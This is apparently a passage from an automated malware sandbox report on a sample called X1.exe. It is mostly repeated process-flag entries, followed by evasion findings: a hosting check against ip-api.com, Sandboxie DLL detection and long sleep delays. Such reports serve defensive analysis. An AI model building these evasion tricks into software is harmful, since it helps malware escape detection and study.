                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Check if machine is in data center or colocation facility
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: X1.exe, 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                            Source: X1.exe, X1.exe.0.drBinary or memory string: SBIEDLL.DLLINFO
                            Source: C:\Users\user\Desktop\X1.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeMemory allocated: 1AE50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\X1.exeMemory allocated: 16D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\X1.exeMemory allocated: 1B250000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\X1.exeMemory allocated: E80000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\X1.exeMemory allocated: 1AD50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\X1.exeMemory allocated: 17B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\X1.exeMemory allocated: 1B210000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599875Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599658Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599532Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599407Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599282Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599157Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599032Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598907Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598782Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598672Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598563Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598438Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598313Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598188Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598063Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597954Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597829Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597704Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597579Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597454Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597329Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597204Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597065Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596928Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596797Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596496Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596375Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596253Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596125Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 595022Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 594906Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 594797Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 594688Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 594578Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\X1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\X1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\X1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\X1.exeWindow / User API: threadDelayed 7822Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeWindow / User API: threadDelayed 1945Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6616Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3138Jump to behavior
